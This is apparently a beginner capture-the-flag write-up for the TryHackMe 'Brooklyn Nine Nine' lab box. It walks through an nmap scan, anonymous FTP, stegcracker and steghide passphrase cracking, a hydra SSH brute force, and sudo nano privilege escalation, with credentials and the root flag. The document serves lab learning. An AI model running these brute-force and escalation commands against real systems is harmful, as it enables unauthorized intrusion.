TryHackMe - Brooklyn Nine Nine - Writeup

This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.

Nmap Scan

root@ip-10-10-251-78:~# nmap -sCV -A -T4

Starting Nmap 7.60 ( ) at 2021-06-18 11:05 BST
Nmap scan report for (
Host is up (0.00056s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:44:F8:0D:32:A3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   0.56 ms (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds

Login to FTP with username anonymous and get the file called note_to_jake.txt

root@ip-10-10-251-78:~# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.07 secs (1.6486 kB/s)
root@ip-10-10-251-78:~# cat note_to_jake.txt
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

nine nine interesting let’s go to web part now.

From the web view source we found a comment said Have you ever heard of steganography?

<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1">
body, html {
  height: 100%;
  margin: 0;

.bg {
  /* The image used */
  background-image: url("brooklyn99.jpg");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;

<div class="bg"></div>

<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->

Download the image from the website try to extract data with steghide

root@ip-10-10-251-78:~/Downloads# steghide extract -sf brooklyn99.jpg
Enter passphrase: 
steghide: can not uncompress data. compressed data is corrupted.

It require password let’s crack the password with stegcracker

root@ip-10-10-251-78:~/Downloads# stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (
Copyright (c) 2021 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20650 passwords
Your file has been written to: brooklyn99.jpg.out

From the ftp text we get nine nine indicating to brooklyn99.jpg now extract the item from the image file with password admin we cracked.

root@ip-10-10-251-78:~/Downloads# steghide extract -sf brooklyn99.jpg
Enter passphrase: 
wrote extracted data to "note.txt".
root@ip-10-10-251-78:~/Downloads# cat note.txt
Holts Password:


Tried to login to SSH as jake using the password we found but it didn’t work. Let’s bruteforce the password of SSH.

root@ip-10-10-251-78:~/Downloads# hydra -t 16 -l jake -P /usr/share/wordlists/rockyou.txt ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2021-06-18 11:52:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: jake   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra ( finished at 2021-06-18 11:52:43

We got password for jake lets login with 987654321

root@ip-10-10-251-78:~/Downloads# ssh jake@
jake@'s password: 
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ cd /home
jake@brookly_nine_nine:/home$ l
amy/  holt/  jake/

As we know holt password and I didn’t found any user.txt in the machine

jake@brookly_nine_nine:~$ su holt
holt@brookly_nine_nine:/home/jake$ ls
holt@brookly_nine_nine:/home/jake$ cd ..
holt@brookly_nine_nine:/home$ ls
amy  holt  jake
holt@brookly_nine_nine:/home$ cd holt
holt@brookly_nine_nine:~$ ls  user.txt
holt@brookly_nine_nine:~$ cat user.txt

Now get root, My first approch is to check sudo -l to check sudo lists

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano

holt can run nano as root. Go to GTFOBins nano

Follow up the command you’ll get root

# whoami
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845


Room Link: Brooklyn Nine Nine

Written on June 18, 2021